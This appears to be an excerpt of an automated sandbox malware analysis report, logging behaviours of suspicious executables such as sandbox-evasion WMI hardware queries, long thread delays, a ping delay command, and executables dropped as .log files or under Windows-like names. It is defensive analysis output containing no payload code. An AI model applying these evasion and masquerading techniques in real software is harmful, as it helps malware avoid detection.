                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                              Malware Analysis System Evasion

                              Source: C:\Windows\System32\schtasks.exe  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe  Memory allocated: A10000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe  Memory allocated: 1A960000 memory reserve | memory write watch
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe  Memory allocated: 16B0000 memory reserve | memory write watch
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe  Memory allocated: 1B280000 memory reserve | memory write watch
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe  Memory allocated: AF0000 memory reserve | memory write watch
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe  Memory allocated: 1A5F0000 memory reserve | memory write watch
                              Source: C:\Recovery\SgrmBroker.exe  Memory allocated: 30C0000 memory reserve | memory write watch
                              Source: C:\Recovery\SgrmBroker.exe  Memory allocated: 1B180000 memory reserve | memory write watch
                              Source: C:\Recovery\SgrmBroker.exe  Memory allocated: 1280000 memory reserve | memory write watch
                              Source: C:\Recovery\SgrmBroker.exe  Memory allocated: 1AF30000 memory reserve | memory write watch
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe  Memory allocated: 1160000 memory reserve | memory write watch
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe  Memory allocated: 1AC70000 memory reserve | memory write watch
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe  Memory allocated: 1280000 memory reserve | memory write watch
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe  Memory allocated: 1B0F0000 memory reserve | memory write watch
                              Source: C:\Recovery\SystemSettings.exe  Memory allocated: 2900000 memory reserve | memory write watch
                              Source: C:\Recovery\SystemSettings.exe  Memory allocated: 1AA80000 memory reserve | memory write watch
                              Source: C:\Recovery\SystemSettings.exe  Memory allocated: 1460000 memory reserve | memory write watch
                              Source: C:\Recovery\SystemSettings.exe  Memory allocated: 1AFC0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe  Memory allocated: CE0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe  Memory allocated: 1A750000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe  Memory allocated: 1510000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe  Memory allocated: 1B350000 memory reserve | memory write watch
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeMemory allocated: 1340000 memory reserve | memory write watch
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeMemory allocated: 1B0E0000 memory reserve | memory write watch
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeMemory allocated: 12D0000 memory reserve | memory write watch
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeMemory allocated: 1AF60000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\SgrmBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\SgrmBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\SystemSettings.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\SystemSettings.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3847Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3156Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3630
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3343
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3872
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3439
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\yHNOGCAC.log
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\PipMsYLy.log
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\GKMojBlr.log
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\iFHJmzLo.log
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\ZQJbcBRg.log
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\zsLwvutf.log
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\GEhWIfwR.log
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\fyKARhRs.log
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\EAqnjiFq.log
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\izcrMdWN.log
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\ZWotDWGG.log
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\PoUdTuAY.log
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\YLyBcRbf.log
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\zGtWfQBc.log
Source: C:\Users\user\Desktop\WinPerfcommon.exe TID: 6736 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7364 | Thread sleep count: 3847 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7164 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe TID: 7412 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7280 | Thread sleep count: 3156 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464 | Thread sleep count: 3630 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484 | Thread sleep count: 3343 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7468 | Thread sleep count: 3872 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496 | Thread sleep count: 3439 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe TID: 6992 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\SgrmBroker.exe TID: 7520 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\SgrmBroker.exe TID: 8060 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe TID: 8076 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe TID: 2944 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\SystemSettings.exe TID: 7608 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\SystemSettings.exe TID: 7588 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\WinPerfcommon.exe TID: 8144 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\WinPerfcommon.exe TID: 7112 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe TID: 7616 | Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe TID: 8024 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe TID: 5804 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE | Last function: Thread delayed
Source: C:\Users\user\Desktop\WinPerfcommon.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\SgrmBroker.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\SgrmBroker.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\SystemSettings.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\SystemSettings.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\WinPerfcommon.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\WinPerfcommon.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
